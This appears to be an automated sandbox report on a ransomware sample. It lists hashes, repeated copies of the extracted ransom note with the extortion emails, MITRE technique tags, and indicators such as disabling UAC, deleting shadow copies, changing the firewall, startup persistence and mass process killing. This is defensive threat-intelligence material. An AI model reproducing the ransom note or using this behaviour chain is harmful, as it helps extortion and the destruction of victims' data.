6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08

General

Target

6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
Size

1.2MB
MD5

e07ee232400dafd802235b90e0e7e056
SHA1

49ab07c411e63e8ad305b58489c69fded1f2db13
SHA256

6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08
SHA512

6607ba5bf390666bf7d3487984c3241783a5137fa2f3af3bc8173a7a1520d1fe5456512cb6eecd613b5ccb30d5f0a41df9987886d1818269068f6fd27958ac41
SSDEEP

24576:Kwh7cD9+IBdH0oIX68Ta7fGXbt8RRnUtX642Rg0ybdDHSF1dRiDHBT2c+T:H7cDUIBdH0Pe7FnUtXh0wSVRi7BT2c+T

Score

10^/10

evasion persistence ransomware trojan

Malware Config

Extracted

Path

\??\c:\Restore_Your_Files.txt

Ransom Note

All Your Files Are Locked And Important Data Downloaded ! Your Files Are No Longer Accessible Don't Waste Your Time, Without Our Decryption Program Nobody Can't Help You . Your ID : NEOMB If You Want To Restore Them Email Us : ransomwarebit@gmail.com If You Do Not Receive A Response Within 24 Hours, Send A Message To Our Second Email : ransomwarebitx@gmail.com To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin . Every Day The Delay Increases The Price !! The Decryption Price Depends On How Fast You Write To Us Email. We Deliver The Decryptor Immediately After Payment , Please Write Your System ID In The Subject Of Your E-mail. If Payment Is Not Made We Will Sell Or Publish Your Data. What is the guarantee ! Before Payment You Can Send Some Files For Decryption Test. If We Do Not Fulfill Our Obligations, No One Does Business With Us , Our Reputation Is Important To Us It's Just Business To Get Benefits. =============================================================================== Attention ! Do Not Rename,Modify Encrypted Files . Do Not Try To Recover Files With Free Decryptors Or Third-Party Programs And Antivirus Solutions Because It May Make Decryption Harder Or Destroy Your Files Forever ! =============================================================================== Buy Bitcoin ! https://www.kraken.com/learn/buy-bitcoin-btc https://www.coinbase.com/how-to-buy/bitcoin

Emails

ransomwarebit@gmail.com

ransomwarebitx@gmail.com

Extracted

Path

\??\c:\$Recycle.Bin\Restore_Your_Files.txt

Ransom Note

All Your Files Are Locked And Important Data Downloaded ! Your Files Are No Longer Accessible Don't Waste Your Time, Without Our Decryption Program Nobody Can't Help You . Your ID : NEOMB If You Want To Restore Them Email Us : ransomwarebit@gmail.com If You Do Not Receive A Response Within 24 Hours, Send A Message To Our Second Email : ransomwarebitx@gmail.com To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin . Every Day The Delay Increases The Price !! The Decryption Price Depends On How Fast You Write To Us Email. We Deliver The Decryptor Immediately After Payment , Please Write Your System ID In The Subject Of Your E-mail. If Payment Is Not Made We Will Sell Or Publish Your Data. What is the guarantee ! Before Payment You Can Send Some Files For Decryption Test. If We Do Not Fulfill Our Obligations, No One Does Business With Us , Our Reputation Is Important To Us It's Just Business To Get Benefits. =============================================================================== Attention ! Do Not Rename,Modify Encrypted Files . Do Not Try To Recover Files With Free Decryptors Or Third-Party Programs And Antivirus Solutions Because It May Make Decryption Harder Or Destroy Your Files Forever ! =============================================================================== Buy Bitcoin ! https://www.kraken.com/learn/buy-bitcoin-btc https://www.coinbase.com/how-to-buy/bitcoinAll Your Files Are Locked And Important Data Downloaded ! Your Files Are No Longer Accessible Don't Waste Your Time, Without Our Decryption Program Nobody Can't Help You . Your ID : NEOMB If You Want To Restore Them Email Us : ransomwarebit@gmail.com If You Do Not Receive A Response Within 24 Hours, Send A Message To Our Second Email : ransomwarebitx@gmail.com To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin . Every Day The Delay Increases The Price !! The Decryption Price Depends On How Fast You Write To Us Email. We Deliver The Decryptor Immediately After Payment , Please Write Your System ID In The Subject Of Your E-mail. If Payment Is Not Made We Will Sell Or Publish Your Data. What is the guarantee ! Before Payment You Can Send Some Files For Decryption Test. If We Do Not Fulfill Our Obligations, No One Does Business With Us , Our Reputation Is Important To Us It's Just Business To Get Benefits. =============================================================================== Attention ! Do Not Rename,Modify Encrypted Files . Do Not Try To Recover Files With Free Decryptors Or Third-Party Programs And Antivirus Solutions Because It May Make Decryption Harder Or Destroy Your Files Forever ! =============================================================================== Buy Bitcoin ! https://www.kraken.com/learn/buy-bitcoin-btc https://www.coinbase.com/how-to-buy/bitcoin

Emails

ransomwarebit@gmail.com

ransomwarebitx@gmail.com

Extracted

Path

\??\c:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\Restore_Your_Files.txt

Ransom Note

All Your Files Are Locked And Important Data Downloaded ! Your Files Are No Longer Accessible Don't Waste Your Time, Without Our Decryption Program Nobody Can't Help You . Your ID : NEOMB If You Want To Restore Them Email Us : ransomwarebit@gmail.com If You Do Not Receive A Response Within 24 Hours, Send A Message To Our Second Email : ransomwarebitx@gmail.com To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin . Every Day The Delay Increases The Price !! The Decryption Price Depends On How Fast You Write To Us Email. We Deliver The Decryptor Immediately After Payment , Please Write Your System ID In The Subject Of Your E-mail. If Payment Is Not Made We Will Sell Or Publish Your Data. What is the guarantee ! Before Payment You Can Send Some Files For Decryption Test. If We Do Not Fulfill Our Obligations, No One Does Business With Us , Our Reputation Is Important To Us It's Just Business To Get Benefits. =============================================================================== Attention ! Do Not Rename,Modify Encrypted Files . Do Not Try To Recover Files With Free Decryptors Or Third-Party Programs And Antivirus Solutions Because It May Make Decryption Harder Or Destroy Your Files Forever ! =============================================================================== Buy Bitcoin ! https://www.kraken.com/learn/buy-bitcoin-btc https://www.coinbase.com/how-to-buy/bitcoinAll Your Files Are Locked And Important Data Downloaded ! Your Files Are No Longer Accessible Don't Waste Your Time, Without Our Decryption Program Nobody Can't Help You . Your ID : NEOMB If You Want To Restore Them Email Us : ransomwarebit@gmail.com If You Do Not Receive A Response Within 24 Hours, Send A Message To Our Second Email : ransomwarebitx@gmail.com To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin . Every Day The Delay Increases The Price !! The Decryption Price Depends On How Fast You Write To Us Email. We Deliver The Decryptor Immediately After Payment , Please Write Your System ID In The Subject Of Your E-mail. If Payment Is Not Made We Will Sell Or Publish Your Data. What is the guarantee ! Before Payment You Can Send Some Files For Decryption Test. If We Do Not Fulfill Our Obligations, No One Does Business With Us , Our Reputation Is Important To Us It's Just Business To Get Benefits. =============================================================================== Attention ! Do Not Rename,Modify Encrypted Files . Do Not Try To Recover Files With Free Decryptors Or Third-Party Programs And Antivirus Solutions Because It May Make Decryption Harder Or Destroy Your Files Forever ! =============================================================================== Buy Bitcoin ! https://www.kraken.com/learn/buy-bitcoin-btc https://www.coinbase.com/how-to-buy/bitcoinAll Your Files Are Locked And Important Data Downloaded ! Your Files Are No Longer Accessible Don't Waste Your Time, Without Our Decryption Program Nobody Can't Help You . Your ID : NEOMB If You Want To Restore Them Email Us : ransomwarebit@gmail.com If You Do Not Receive A Response Within 24 Hours, Send A Message To Our Second Email : ransomwarebitx@gmail.com To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin . Every Day The Delay Increases The Price !! The Decryption Price Depends On How Fast You Write To Us Email. We Deliver The Decryptor Immediately After Payment , Please Write Your System ID In The Subject Of Your E-mail. If Payment Is Not Made We Will Sell Or Publish Your Data. What is the guarantee ! Before Payment You Can Send Some Files For Decryption Test. If We Do Not Fulfill Our Obligations, No One Does Business With Us , Our Reputation Is Important To Us It's Just Business To Get Benefits. =============================================================================== Attention ! Do Not Rename,Modify Encrypted Files . Do Not Try To Recover Files With Free Decryptors Or Third-Party Programs And Antivirus Solutions Because It May Make Decryption Harder Or Destroy Your Files Forever ! =============================================================================== Buy Bitcoin ! https://www.kraken.com/learn/buy-bitcoin-btc https://www.coinbase.com/how-to-buy/bitcoin

Emails

ransomwarebit@gmail.com

ransomwarebitx@gmail.com

Signatures

UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Creates new service(s) 1 TTPs
persistence

New Service
T1050
Modifies Windows Firewall 1 TTPs 3 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exenetsh.exenetsh.exe

pid process

1608 netsh.exe
1392 netsh.exe
528 netsh.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

pid	process
1608	netsh.exe
1392	netsh.exe
528	netsh.exe

Drops startup file 2 IoCs

Processes:

6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe

description	ioc	process
File opened (read-only)	\??\F:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\I:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\K:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\S:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\T:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\V:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\A:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\G:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\L:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\P:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\W:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\Y:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\Z:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\B:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\E:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\H:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\M:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\Q:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\X:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\J:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\N:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\O:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\R:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\U:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

4 api.ipify.org

flow	ioc
4	api.ipify.org

Drops file in Program Files directory 64 IoCs

Processes:

6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe

description	ioc	process
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\ipsptb.xml	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\zh-tw.txt_[ID-NEOMB_Mail-ransomwarebit@gmail.com].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad.xml	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_altgr.xml	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\ro.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\uz.txt_[ID-NEOMB_Mail-ransomwarebit@gmail.com].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\baseAltGr_rtl.xml	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Hand Prints.htm	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\ba.txt_[ID-NEOMB_Mail-ransomwarebit@gmail.com].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\Microsoft Shared\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\keypadbase.xml	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\System\ado\en-US\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\System\msadc\en-US\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\ms.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\ug.txt_[ID-NEOMB_Mail-ransomwarebit@gmail.com].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\kor-kor.xml	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\Microsoft Shared\MSInfo\es-ES\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\Microsoft Shared\TextConv\es-ES\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\ne.txt_[ID-NEOMB_Mail-ransomwarebit@gmail.com].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\hwrfrash.dat	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\ipscht.xml	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\ps.txt_[ID-NEOMB_Mail-ransomwarebit@gmail.com].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\ga.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\kab.txt_[ID-NEOMB_Mail-ransomwarebit@gmail.com].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\System\ado\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\fi.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Genko_2.emf	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\System\ado\de-DE\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\de-DE\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\Microsoft Shared\ink\es-ES\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\ko.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\ru.txt_[ID-NEOMB_Mail-ransomwarebit@gmail.com].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\el.txt_[ID-NEOMB_Mail-ransomwarebit@gmail.com].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\fur.txt_[ID-NEOMB_Mail-ransomwarebit@gmail.com].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\he.txt_[ID-NEOMB_Mail-ransomwarebit@gmail.com].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\ka.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\fr.txt_[ID-NEOMB_Mail-ransomwarebit@gmail.com].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\nn.txt_[ID-NEOMB_Mail-ransomwarebit@gmail.com].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\ipschs.xml	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\7-Zip\Lang\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\af.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\System\fr-FR\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\SpeechEngines\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\ku-ckb.txt_[ID-NEOMB_Mail-ransomwarebit@gmail.com].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\sl.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\sr-spl.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\MSInfo\es-ES\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\eu.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\th.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\zh-CN\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\vi.txt_[ID-NEOMB_Mail-ransomwarebit@gmail.com].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\Alphabet.xml	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\hwrdeslm.dat	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\es-ES\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\hwrenclm.dat	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\hwresslm.dat	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\Microsoft Shared\ink\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe

Drops file in Windows directory 2 IoCs

Processes:

6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe

description	ioc	process
File created	C:\Windows\SysMain.sys	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	C:\Windows\SysMain.sys	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe

Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exe

pid process

1496 sc.exe
1648 sc.exe
1640 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1488 schtasks.exe
Delays execution with timeout.exe 8 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

1492 timeout.exe
1088 timeout.exe
1128 timeout.exe
972 timeout.exe
468 timeout.exe
904 timeout.exe
1492 timeout.exe
1160 timeout.exe

pid	process
1496	sc.exe
1648	sc.exe
1640	sc.exe

pid	process
1488	schtasks.exe

pid	process
1492	timeout.exe
1088	timeout.exe
1128	timeout.exe
972	timeout.exe
468	timeout.exe
904	timeout.exe
1492	timeout.exe
1160	timeout.exe

Enumerates processes with tasklist 1 TTPs 9 IoCs

Process Discovery

T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid	process
1384	tasklist.exe
976	tasklist.exe
624	tasklist.exe
1608	tasklist.exe
1016	tasklist.exe
888	tasklist.exe
1792	tasklist.exe
1540	tasklist.exe
1192	tasklist.exe

Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exesysteminfo.exe

pid process

744 systeminfo.exe
1692 systeminfo.exe
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

1864 vssadmin.exe
1596 vssadmin.exe

pid	process
744	systeminfo.exe
1692	systeminfo.exe

pid	process
1864	vssadmin.exe
1596	vssadmin.exe

Kills process with taskkill 39 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
996	taskkill.exe
596	taskkill.exe
660	taskkill.exe
1276	taskkill.exe
1076	taskkill.exe
1724	taskkill.exe
820	taskkill.exe
1276	taskkill.exe
568	taskkill.exe
1124	taskkill.exe
824	taskkill.exe
1128	taskkill.exe
1820	taskkill.exe
1808	taskkill.exe
2020	taskkill.exe
772	taskkill.exe
2008	taskkill.exe
1256	taskkill.exe
1272	taskkill.exe
1768	taskkill.exe
840	taskkill.exe
1732	taskkill.exe
1408	taskkill.exe
360	taskkill.exe
1016	taskkill.exe
1084	taskkill.exe
912	taskkill.exe
1636	taskkill.exe
1688	taskkill.exe
1196	taskkill.exe
1812	taskkill.exe
888	taskkill.exe
596	taskkill.exe
1716	taskkill.exe
1616	taskkill.exe
432	taskkill.exe
1392	taskkill.exe
1384	taskkill.exe
1060	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

684 reg.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

tasklist.exetasklist.exe

pid process

976 tasklist.exe
976 tasklist.exe
624 tasklist.exe
624 tasklist.exe

pid	process
684	reg.exe

pid	process
976	tasklist.exe
976	tasklist.exe
624	tasklist.exe
624	tasklist.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

tasklist.exetasklist.exevssvc.exetasklist.exetasklist.exeWMIC.exetasklist.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetasklist.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	976	tasklist.exe
Token: SeDebugPrivilege	624	tasklist.exe
Token: SeBackupPrivilege	1044	vssvc.exe
Token: SeRestorePrivilege	1044	vssvc.exe
Token: SeAuditPrivilege	1044	vssvc.exe
Token: SeDebugPrivilege	1540	tasklist.exe
Token: SeDebugPrivilege	1192	tasklist.exe
Token: SeIncreaseQuotaPrivilege	360	WMIC.exe
Token: SeSecurityPrivilege	360	WMIC.exe
Token: SeTakeOwnershipPrivilege	360	WMIC.exe
Token: SeLoadDriverPrivilege	360	WMIC.exe
Token: SeSystemProfilePrivilege	360	WMIC.exe
Token: SeSystemtimePrivilege	360	WMIC.exe
Token: SeProfSingleProcessPrivilege	360	WMIC.exe
Token: SeIncBasePriorityPrivilege	360	WMIC.exe
Token: SeCreatePagefilePrivilege	360	WMIC.exe
